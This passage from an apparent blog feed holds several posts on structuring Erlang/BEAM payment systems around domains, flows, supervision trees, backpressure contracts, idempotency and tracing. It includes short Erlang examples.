&lt;li&gt;&lt;strong&gt;Data flow&lt;/strong&gt;: The payments domain owns card tokens and risk data; it emits an authorization fact when done. The ledger domain owns balances and journal entries; it exposes append-only writes. Notifications subscribe to the authorization fact and the ledger entry, derive their own view, and never peek into foreign ETS tables.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Process flow&lt;/strong&gt;: Each domain runs inside its own supervision tree. The payments domain spawns a per-authorization worker supervised &lt;code&gt;one_for_one&lt;/code&gt;. The ledger domain keeps long-lived resource owners guarded by a &lt;code&gt;rest_for_one&lt;/code&gt; tree. Notifications use a pool of short-lived workers. If the PSP adapter dies, only its tree restarts; the ledger keeps writing.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Every arrow on the whiteboard now has a name. When something breaks, you know whether it is a data-contract issue, a message protocol bug, a process-topology failure, or a call-budget miss. Compliance questions (“who touched the ledger?”) get answered by pointing to the domain module and its audit log. Operational questions (“why did latency spike?”) use the same flow instrumentation you designed earlier. The orchestrator’s outbox ties database writes and message dispatch together, while the ledger enforces idempotency on the tuple &lt;code&gt;{account_id, idem_key}&lt;/code&gt; so replays never duplicate money.&lt;/p&gt;
&lt;h1 id=&quot;logging-and-tracing-at-the-boundaries&quot; tabindex=&quot;-1&quot;&gt;Logging and tracing at the boundaries&lt;/h1&gt;
&lt;p&gt;Every domain boundary is also a logging boundary. When the API domain hands control to the payments domain, log the intent, the trace identifier, and the schema version that crossed the line. When the payments domain emits an authorization event, append the fact to its domain log with the same &lt;code&gt;trace_id&lt;/code&gt;. The ledger domain writes its own append-only audit trail when balances change. That gives regulators exactly what they ask for: who touched the data, when, and through which contract.&lt;/p&gt;
&lt;p&gt;For cross-domain flows, propagate &lt;code&gt;trace_id&lt;/code&gt; and &lt;code&gt;span_id&lt;/code&gt; through OpenTelemetry (or the tracing stack you already run). Each message send, process spawn, and reply records the context so you can reconstruct the path end to end. Mailbox metrics tell you if a process is drowning; traces tell you which hop stalled. When every domain owns its logging and every flow forwards its trace context, observability stops being a bolt-on and becomes part of the boundary contract.&lt;/p&gt;
&lt;p&gt;Use spans &lt;code&gt;api.receive → orchestrate.authorize → psp.call → ledger.append → notify.send&lt;/code&gt;. Log &lt;code&gt;schema_version&lt;/code&gt; and &lt;code&gt;idem_key&lt;/code&gt; at each hop. If a message replays, the trace shows it, and idempotency plus the shared &lt;code&gt;#msg_meta{}&lt;/code&gt; header keep state clean.&lt;/p&gt;
&lt;h1 id=&quot;checklist-before-you-ship&quot; tabindex=&quot;-1&quot;&gt;Checklist before you ship&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Domain map&lt;/strong&gt;: Draw boxes for each domain, list the data they own, and the modules/OTP apps that implement them.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flow contracts&lt;/strong&gt;: For every boundary, document the data schema, message protocol, supervising tree, and call budget.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Observability hooks&lt;/strong&gt;: Ensure trace IDs, mailbox metrics, schema registries, and breaker dashboards are wired to the flow they observe.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Failure drills&lt;/strong&gt;: Kill a payments worker, a ledger supervisor, and a notification queue. Each failure should stay inside its domain boundary while the flow recovers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Outbox pause test&lt;/strong&gt;: Stop the orchestrator’s outbox process and prove that no dual-write happens; once it restarts, pending messages drain exactly once.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;whats-next&quot; tabindex=&quot;-1&quot;&gt;What’s next&lt;/h1&gt;
&lt;p&gt;If you skipped ahead, start with
&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt;, then
read
&lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt;
and
&lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Next up we will focus on the process archetypes: workers, resource owners,
routers, gatekeepers, observers, and show how they sit inside these flows.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;Process Archetypes&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Flows Keep Work Moving</title>
    <link href="https://happihacking.com/blog/posts/2025/flows-keep-work-moving/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/flows-keep-work-moving/</id>
    <summary>Design data, message, process, and call paths on purpose</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt; Resource owner = the process that owns mutable state for a domain object. Request owner = the process coordinating one user request end-to-end within a domain. Adapter = the boundary process that talks to an external system. Orchestration = the domain that coordinates multi-step work across other domains. PSP = payment service provider (card processor); the PSP adapter isolates that boundary.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_vs_machines.jpg&quot; alt=&quot;Gnome village vs machine park flow&quot; title=&quot;Gnome village vs machine park flow - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;flow-primer-four-ways-things-move&quot; tabindex=&quot;-1&quot;&gt;Flow primer: four ways things move&lt;/h1&gt;
&lt;p&gt;When you think in processes, a system splits into domains that own
resources and flows that move work. A flow tells you how facts, intents,
and control cross a domain boundary. Four flows cover day-to-day design:
data flow, message flow, process flow, and call flow.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/0638eeef9846c3befed7bfb7a6113761.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;The same topology looks different depending on which flow you inspect. Call flow covers the synchronous reply path, message flow covers the async fan-out, data flow tracks typed payloads, and process flow explains who runs each step.&lt;/p&gt;
&lt;h2 id=&quot;data-flow&quot; tabindex=&quot;-1&quot;&gt;Data flow&lt;/h2&gt;
&lt;p&gt;Data flow answers “what moves.”&lt;/p&gt;
&lt;p&gt;It describes the schema and lineage of facts as they travel through the
system. Define which domain publishes which fact, how versions evolve,
where you materialize views, and how you replay history if something
breaks. At the boundary, the producing domain publishes only the data it
owns; the consuming domain derives its own model instead of poking at
another domain’s private state.&lt;/p&gt;
&lt;h2 id=&quot;message-flow&quot; tabindex=&quot;-1&quot;&gt;Message flow&lt;/h2&gt;
&lt;p&gt;Message flow answers “who talks to whom and with what guarantees.”&lt;/p&gt;
&lt;p&gt;It defines the protocols between resource-owning gnomes. Decide whether a
payload is a command or an event, whether ordering matters, how to
correlate, how to retry, and what to do with dead letters.&lt;/p&gt;
&lt;p&gt;Message flow is the civility layer: domains ask each other for help through
documented messages and accept the delivery guarantees the protocol
provides.&lt;/p&gt;
&lt;h3 id=&quot;backpressure-contract&quot; tabindex=&quot;-1&quot;&gt;Backpressure contract&lt;/h3&gt;
&lt;p&gt;Backpressure is a &lt;strong&gt;protocol&lt;/strong&gt;, not an implementation detail. The contract
lives in &lt;strong&gt;message flow&lt;/strong&gt; and defines how senders must slow down.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Outcomes for &lt;code&gt;enqueue&lt;/code&gt; across a boundary:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ok&lt;/code&gt; — accepted now.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{busy, RetryMs}&lt;/code&gt; — not accepted; sender should back off for ~&lt;code&gt;RetryMs&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{queued, Pos}&lt;/code&gt; — accepted into a queue; sender may pace based on &lt;code&gt;Pos&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Async variant:&lt;/strong&gt; &lt;code&gt;cast&lt;/code&gt; carries &lt;code&gt;{ReplyTo, Ref}&lt;/code&gt;; the server replies with &lt;code&gt;{ack, Ref}&lt;/code&gt; or &lt;code&gt;{busy, Ref, RetryMs}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Idempotency:&lt;/strong&gt; all retries carry the same &lt;code&gt;idem_key&lt;/code&gt;. Receivers must dedup.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sender behavior:&lt;/strong&gt; on &lt;code&gt;{busy, RetryMs}&lt;/code&gt;, jittered sleep; on timeouts,
switch to exponential backoff; abandon after a budget.&lt;/p&gt;
&lt;p&gt;The callee decides &lt;code&gt;ok&lt;/code&gt;, &lt;code&gt;busy&lt;/code&gt;, or &lt;code&gt;queued&lt;/code&gt; based on its process-flow limits (bounded queues, concurrency caps).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Synchronous patterns (caller waits)&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;call with {ok|busy, RetryMs} contract for explicit backpressure.&lt;/li&gt;
&lt;li&gt;Bounded concurrency (semaphore) around the callee; caller blocks until a slot frees.&lt;/li&gt;
&lt;li&gt;Hedged calls with budget (fail fast if downstream is slow; no retries beyond budget).&lt;/li&gt;
&lt;li&gt;Token-bucket at the caller (rate-limit before sending).&lt;/li&gt;
&lt;li&gt;Inline validation+reject (cheap checks sync; expensive work deferred async).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Asynchronous patterns (caller doesn’t wait)&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Job ID + completion event (done|failed later to a notifier).&lt;/li&gt;
&lt;li&gt;Credit/pull-based demand (consumer grants credits; producer sends only with credit).&lt;/li&gt;
&lt;li&gt;Outbox submit + occasional status query (running|done|failed) outside the hot path.&lt;/li&gt;
&lt;li&gt;Monitor the worker (react to DOWN or completion messages; no send-time blocking).&lt;/li&gt;
&lt;li&gt;Pressure subscription (publish high|mid|low; senders pace heuristically).&lt;/li&gt;
&lt;li&gt;TTL/deadline in payload (receiver drops/defers if expired; sender uses compensations).&lt;/li&gt;
&lt;li&gt;Queue TTL + DLQ (expired work is rerouted; upstream metrics trigger
pacing).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Tiny sync call template (example shape only; the contract is defined above):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Sync protocol
handle_call({enqueue, Msg, Idem}, _From, S=#state{q=Q}) -&amp;gt;
  case queue:len(Q) &amp;gt;= ?MAX of
    true  -&amp;gt; {reply, {busy, 50}, S};
    false -&amp;gt; {reply, ok, S#state{q=queue:in({Idem,Msg}, Q)}}
  end.
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;process-flow&quot; tabindex=&quot;-1&quot;&gt;Process flow&lt;/h2&gt;
&lt;p&gt;Process flow answers “who does the work and how it survives failure.”&lt;/p&gt;
&lt;p&gt;It is the topology and lifecycle of the workers. Define where workers live,
who supervises them, how they restart, how you cap concurrency.&lt;/p&gt;
&lt;p&gt;Pick the supervisor strategy that matches dependency: one_for_one for
isolated workers, rest_for_one when downstream children depend on an
upstream owner, and one_for_all when the group must rise and fall together.
Use a Dynamic Supervisor when children are created at runtime.&lt;/p&gt;
&lt;p&gt;Set each child’s restart type: permanent (always), transient (only on
crash), or temporary (never). Combine with a restart budget (max_restarts /
max_seconds) per subtree to cap blast radius. Add backoff with jitter on
restarts to avoid herd effects. Choose shutdown timeouts per role: short
for stateless workers, longer for stateful owners that must flush.&lt;/p&gt;
&lt;p&gt;When we discuss process types in a future post we will also talk about
supervision tree structures.&lt;/p&gt;
&lt;h2 id=&quot;call-flow&quot; tabindex=&quot;-1&quot;&gt;Call flow&lt;/h2&gt;
&lt;p&gt;Call flow answers &amp;quot;how control and data move inside code.&amp;quot;&lt;/p&gt;
&lt;p&gt;Scope it to a single domain: from the entry point to the exit value,
including timing, cancellation, and error policy. At a domain boundary,
switch to message flow (that’s where backpressure and delivery semantics
live); don’t stretch a synchronous chain across domains.&lt;/p&gt;
&lt;p&gt;Design the path first, then the code:&lt;/p&gt;
&lt;p&gt;Keep the hot path short and explicit. Do validation and cheap lookups
inline; push slow or blocking work to workers. Set an end-to-end budget and
per-hop timeouts that fit inside it. Propagate context (trace_id, tenant,
deadline) through every call so lower layers can fail fast instead of
queuing doomed work. Make retries deliberate and only for idempotent steps;
prefer fallbacks or compensation over deep retry ladders. Avoid re-entrant
call cycles and synchronous “ping-pong” between processes—those become
invisible locks.&lt;/p&gt;
&lt;p&gt;Three common shapes cover most cases. Straight-through: a request owner
runs a small stack of pure transforms and one side-effect at the edge.
Short async detour: issue a local task and rejoin before the budget ends
(still inside the domain). Cross-domain work: cut the call, emit a message,
and return; any further coordination belongs to message flow.&lt;/p&gt;
&lt;p&gt;A quick checklist when you cut a path: define the return value and error
space; set an end-to-end deadline and per-hop timeouts; decide where
retries are allowed (and prove idempotency); push blocking work off the
scheduler; propagate trace_id and deadline; and terminate the call at the
boundary.&lt;/p&gt;
&lt;h1 id=&quot;instrumenting-the-flows&quot; tabindex=&quot;-1&quot;&gt;Instrumenting the flows&lt;/h1&gt;
&lt;p&gt;Put the four flows around the same boundary and they reinforce each other. A call enters a domain, triggers messages to other domains, moves data through transformations, and runs on supervised processes. Each flow covers a different design question, but they all point to the same contract.&lt;/p&gt;
&lt;p&gt;Every cross-domain message carries the same metadata so tracing, retries, and upgrades stay predictable:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-record(msg_meta, {
    trace_id       :: binary(),
    span_id        :: binary(),
    causation_id   :: binary(),
    schema_version :: integer(),
    idem_key       :: binary(),   % for deduplication
    sent_at        :: integer()   % unix ms
}).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Tooling hooks sit where the flows live:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trace IDs and causation IDs follow message flow across domain boundaries.&lt;/li&gt;
&lt;li&gt;Mailbox depth, queue lengths, and throughput expose process-flow pressure and health.&lt;/li&gt;
&lt;li&gt;Supervision trees double as topology diagrams and recovery plans.&lt;/li&gt;
&lt;li&gt;Schema registries, contract tests, and version dashboards keep data flow honest.&lt;/li&gt;
&lt;li&gt;Endpoint timeouts and breaker dashboards make call flow visible and tunable.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Use this primer as a checklist every time you cut a boundary. Define the data contract, message protocol, process topology, and call budget. Once those are in place, the gnomes can work without stepping on each other’s toes.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/687a1ffb261f61d5629a244004b37127.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;Highlight the idempotency contact points: the request owner refuses to start the same job twice, the ledger ignores duplicate trace IDs, and the PSP adapter retries safely. Once those guardrails are in place, replays and retries stop being scary.&lt;/p&gt;
&lt;h1 id=&quot;anti-patterns-and-fixes&quot; tabindex=&quot;-1&quot;&gt;Anti-patterns and fixes&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Data flow:&lt;/strong&gt; Probing foreign ETS tables ties domains together and guarantees stale reads. Publish the facts your domain owns, let other domains subscribe, and derive local views from the feed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Message flow:&lt;/strong&gt; Fire-and-forget without correlation means you never know which request triggered which side effect. Always include correlation/causation IDs and route failures to a dead-letter queue so you can replay with context.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Process flow:&lt;/strong&gt; Unbounded mailboxes hide backpressure until the VM falls over. Cap queues, drop or park excess work deliberately, and surface the metrics so upstream request owners can slow down—the same metrics feed the message-flow backpressure contract.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Call flow:&lt;/strong&gt; Synchronous chains that cross domain boundaries turn every deployment into a distributed transaction. Cut the boundary, emit a message plus an outbox write, and let the receiving domain drive its own timeline.&lt;/p&gt;
&lt;h1 id=&quot;flow-checklist&quot; tabindex=&quot;-1&quot;&gt;Flow checklist&lt;/h1&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flow type&lt;/th&gt;
&lt;th&gt;Design focus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Data flow&lt;/td&gt;
&lt;td&gt;Owner, schema &amp;amp; version, evolution plan, replay/materialization strategy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message flow&lt;/td&gt;
&lt;td&gt;Command vs event, ordering key, retry/backoff, DLQ, idempotency rule&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process flow&lt;/td&gt;
&lt;td&gt;Supervision strategy, concurrency limits, mailbox bounds, backpressure signal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Call flow&lt;/td&gt;
&lt;td&gt;Sync vs async, timeout budget per hop, breaker policy, fallback/compensation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h1 id=&quot;where-to-next&quot; tabindex=&quot;-1&quot;&gt;Where to next&lt;/h1&gt;
&lt;p&gt;If you have not read the setup, start with &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; and &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt;. When the flows make sense, jump to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It Together&lt;/a&gt; for a payments-style walkthrough, then stay tuned for the process-archetype deep dive.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Gnomes, Domains, and Flows: Putting It Together&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Domains Own Code and Data</title>
    <link href="https://happihacking.com/blog/posts/2025/domains-own-code-and-data/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/domains-own-code-and-data/</id>
    <summary>Keep modules, OTP apps, and state in the same lane</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt; Resource owner = the process that owns mutable state for a domain object. Request owner = the process coordinating one user request end-to-end within a domain. Adapter = the boundary process that talks to an external system. Orchestration = the domain that coordinates multi-step work across other domains.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/chess.jpg&quot; alt=&quot;Strategy for carving domains&quot; title=&quot;Strategy for carving domains&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;what-domain-means-here&quot; tabindex=&quot;-1&quot;&gt;What “domain” means here&lt;/h1&gt;
&lt;p&gt;“Domain” already carries Domain-Driven Design baggage. I am using the same
word, but a thinner slice. DDD talks about bounded contexts, aggregates,
and ubiquitous language. Those tools are useful, but you do not need the
full ceremony to keep code and state aligned. Here a domain is the smallest
boundary where the data types, invariants, and transformations still belong
together.&lt;/p&gt;
&lt;p&gt;If you already speak DDD, translate this to a bounded context or even a
single aggregate module. If you do not, the rule still works: put the
structs and the logic that operate on them in the same OTP app or module,
treat that unit as the owner, and force everything else to go through a
public API or explicit message.&lt;/p&gt;
&lt;h1 id=&quot;carving-domains-on-the-beam&quot; tabindex=&quot;-1&quot;&gt;Carving domains on the BEAM&lt;/h1&gt;
&lt;p&gt;On the BEAM, domains map cleanly to modules and applications. A module
defines the types and functions for one area. An OTP application groups
related modules, supervision trees, and configuration. That gives you both
the static boundary (code) and the runtime boundary (process tree).&lt;/p&gt;
&lt;p&gt;Take a payments stack:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;user domain&lt;/strong&gt; owns user structs, validation rules, and identity checks.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;order domain&lt;/strong&gt; owns order records, pricing, and state transitions.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;ledger domain&lt;/strong&gt; owns balances, accounting entries, and append-only logs.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Keep the code and data for each domain in the same module or OTP app so you
can see who owns what. Every process reads the scroll that belongs to the
domain it needs, nothing more. When the ledger lives in its own app, you
know which processes keep the balances, which module updates them, and
where to add tracing or logging for auditors. It also prevents other teams
from “borrowing” ledger state through ETS because that state simply does
not live outside the boundary.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/65a8539d3ca4645d722a689d3eef542d.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;Each box in the diagram is one domain owning its data and behavior. Draw your own version for every system you build, then make sure the codebase mirrors it.&lt;/p&gt;
&lt;h1 id=&quot;spotting-and-fixing-anti-patterns&quot; tabindex=&quot;-1&quot;&gt;Spotting and fixing anti-patterns&lt;/h1&gt;
&lt;p&gt;The common failure is one module juggling multiple domains because “it was
convenient.” You end up with user structs sitting next to payment
calculations and helper processes that touch everything. The fix is
mechanical:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Draw boxes for each domain and list the types and transformations inside.&lt;/li&gt;
&lt;li&gt;Anything that does not fit cleanly in one box belongs in another.&lt;/li&gt;
&lt;li&gt;Move the code, give it a public API, and make callers use the new boundary.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;That diagram also becomes your compliance evidence: it shows which module
owns which data, who can mutate it, and how flows cross the boundary.&lt;/p&gt;
&lt;h1 id=&quot;contracts-not-processes&quot; tabindex=&quot;-1&quot;&gt;Contracts, not processes&lt;/h1&gt;
&lt;p&gt;Once domains are clean, the contracts become obvious. A process still runs
whatever code you load and upgrade, but it calls into a domain with a
stable API and types. Messages carry domain-typed payloads instead of
anonymous maps, and you can trace mutations back to the module that owns
them. Auditors do not care which PID touched the ledger; they care which
domain exposes the write function.&lt;/p&gt;
&lt;p&gt;A process is disposable; a domain API is durable. Optimize for the latter.&lt;/p&gt;
&lt;p&gt;“Code and data live together” means domain modules control the surface
area, while processes remain throwaway workers that call those modules.
Keep that separation clear and the runtime can change shape without
drifting away from the structure.&lt;/p&gt;
&lt;h1 id=&quot;evolution-and-rollouts&quot; tabindex=&quot;-1&quot;&gt;Evolution and rollouts&lt;/h1&gt;
&lt;p&gt;Domains change, but you can keep the blast radius small. Version schemas explicitly and run contract tests at every domain boundary. When an external API shifts, ship a blue/green adapter so you can flip traffic without downtime. For ledgers and other append-only stores, support dual-write plus read-switch migrations: write to both schemas, backfill, then flip readers once parity is proven. Small, well-defined domains make those rollouts boring.&lt;/p&gt;
&lt;h1 id=&quot;where-to-next&quot; tabindex=&quot;-1&quot;&gt;Where to next&lt;/h1&gt;
&lt;p&gt;Now that the boundaries are clear, read &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt; for the four flow checklists, then jump to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It Together&lt;/a&gt; to see the whole frame land in a payments example. If you need the origin story, start with &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Gnomes, Domains, and Flows</title>
    <link href="https://happihacking.com/blog/posts/2025/gnomes-domains-flows/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/gnomes-domains-flows/</id>
    <summary>Why boundaries decide whether the village holds</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Resource owner = the process that owns mutable state for a domain object.&lt;/li&gt;
&lt;li&gt;Request owner = the process coordinating one user request end-to-end
within a domain.&lt;/li&gt;
&lt;li&gt;Adapter = the boundary process that talks to an external system.&lt;/li&gt;
&lt;li&gt;Orchestration = the domain that coordinates multi-step work across other domains.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_vs_machines.jpg&quot; alt=&quot;Machine parks versus gnome villages&quot; title=&quot;Machine parks versus gnome villages - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;We started this series by meeting the gnomes: tiny BEAM processes with
private backpacks, polite mailboxes, and no interest in shared memory. In
the last post we met their supervisors, the managers who calmly restart
whoever drops a hammer. Together they gave us a village that keeps working
even when a gnome explodes. Processes are cheap, isolation is free, and
supervision trees are better than trust falls.&lt;/p&gt;
&lt;p&gt;Teams still end up with machine parks because they wrap threads in classes,
share mutable state “just this once,” and trust the global lock. When one
thread stalls, everything piles up behind it. Debugging becomes sorting
through shared variables to guess who touched what. Compliance shifts into
endless reviews of access control. In the gnome village you spawn another
process, send a message, restart the failed worker, and keep going.
Predictable beats clever machinery.&lt;/p&gt;
&lt;p&gt;This post is the hinge between the metaphor and the mechanics. Processes
(gnomes) are the runtime, but domains decide how code and state are
organized, and flows define how work travels between them. Align those
three layers and the system stops fighting you. Ignore them and you get
accidental coupling: an API reaching into the wrong ETS table, a supervisor
tree overloaded with synchronous calls, dashboards lighting up because no
one knows where the flow broke. From here on, “resource owner” means “the
process that owns mutable state,” “request owner” is the process running an
end-to-end request, and an “adapter” is the boundary to an external system.&lt;/p&gt;
&lt;h2 id=&quot;compliance-breaks-when-architecture-drifts&quot; tabindex=&quot;-1&quot;&gt;Compliance breaks when architecture drifts&lt;/h2&gt;
&lt;p&gt;At &lt;a href=&quot;https://happihacking.com/talks/fintech-systems-codebeam-2025/&quot;&gt;Code BEAM Berlin&lt;/a&gt; I said
compliance is just good engineering done on purpose. Auditors ask for
logging, isolation, and predictable behavior because those are the only
ways to prove who did what and when. Tie code, state, and runtime behavior
into one lump and you lose that evidence. The regulator is not the problem.
Your architecture is.&lt;/p&gt;
&lt;p&gt;Systems fail when code, state, and call patterns drift apart. You add one
bypass, then a shared cache, then a blocking call in a handler, and
suddenly the code and the runtime disagree. The result is stale data, full
mailboxes, and synchronous chains nobody planned. Fix the boundaries. The
boundaries are what we call domains.&lt;/p&gt;
&lt;h2 id=&quot;processes&quot; tabindex=&quot;-1&quot;&gt;Processes&lt;/h2&gt;
&lt;p&gt;Gnomes are still the core unit. Each process owns its heap, reads scrolls
from the code server, and works under a supervisor that can restart it
without ceremony. Processes are the runtime execution layer; they carry the
work but they do not define the structure. Keep them small, give them one
job, and let supervision trees isolate failure.&lt;/p&gt;
&lt;h2 id=&quot;domains&quot; tabindex=&quot;-1&quot;&gt;Domains&lt;/h2&gt;
&lt;p&gt;Domains are the structural layer. A domain owns its types, invariants, and
transformations. On the BEAM, that means modules and OTP apps that contain
code and state for one bounded area—users, orders, ledgers, adapters.
Domains give the processes something coherent to execute so state does not
drift into random helper modules.&lt;/p&gt;
&lt;h2 id=&quot;flows&quot; tabindex=&quot;-1&quot;&gt;Flows&lt;/h2&gt;
&lt;p&gt;Flows are the choreography layer. They define how calls, messages, data,
and processes move between domains. When the flows are explicit, you know
which protocol crosses each boundary, which process owns each step, and
which metrics tell you when something is stuck. Flows keep the gnomes
polite when they have to cross domain borders.&lt;/p&gt;
&lt;h2 id=&quot;where-we-go-next&quot; tabindex=&quot;-1&quot;&gt;Where we go next&lt;/h2&gt;
&lt;p&gt;From here, hop to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and
Data&lt;/a&gt; for the practical
slicing patterns, then to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work
Moving&lt;/a&gt; for the checklists.
Finish with &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It
Together&lt;/a&gt; to
see how it lands in a payment-style system. After that we will head into
process archetypes.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/supervisors-are-managers/&quot;&gt;Supervisors Are Managers&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Supervisors Are Managers</title>
    <link href="https://happihacking.com/blog/posts/2025/supervisors-are-managers/"/>
    <updated>2025-11-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/supervisors-are-managers/</id>
    <summary>Build a village of gnomes, not a park of machines.</summary>
